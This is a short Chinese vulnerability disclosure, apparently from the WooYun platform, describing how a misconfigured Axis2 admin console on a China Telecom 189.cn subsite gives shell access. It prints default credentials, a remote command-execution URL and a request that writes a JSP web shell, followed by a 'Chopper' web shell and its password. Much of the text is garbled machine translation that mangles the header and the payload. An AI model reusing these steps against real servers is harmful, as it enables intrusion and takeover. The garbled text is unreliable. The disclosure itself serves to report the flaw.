中国电信189.cn某分站运维不当导致getshell

漏洞标题 中国电信189.cn某分站运维不当导致getshell 相关厂商 中国电信 漏洞作者 撸撸侠 提交时间 2016-04-22 20:40 公开时间 2016-06-10 18:50 漏洞类型…

漏洞标题 中国电信189.cn分站运营维护不当导致了问题 相关制造商 中国电信 漏洞作者 姚夏 提交时间 2016-04-22 20: 40 公共时间 2016-06-10 18: 50 漏洞类型 系统/服务操作和维护配置不当 危险等级 高 自我评估等级 20 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 漏洞详细信息 http://**。**。**。**: 8081/axis2/axis2-admin/login admin axis2 由于端口的原因,您需要更改包,可以用burp替换它。 http://**。**。**。**: 8081/axis2/services/Cat/exec?cmd=whoami http://**。**。**。**: 8081/point/f.jsp f 写小马 http://**。**。**。**: 8081/axis2/services/Cat/writeStringToFile?data=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%**。* * ** **。FileOutputStream中(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22F%22)))。写(用request.getParameter(%22吨%22).getBytes()) %3B%25%3E&安培;文件=/选择/订购的Web/web应用/的axis2/q2.jsp&安培;编码=UTF-8和;追加=假 然后写一把菜刀马 http://**。**。**。**: 8081/axis2/test.jsp密码: f 漏洞证明:

修理计划: 版权声明:请注明出处撸撸侠@乌云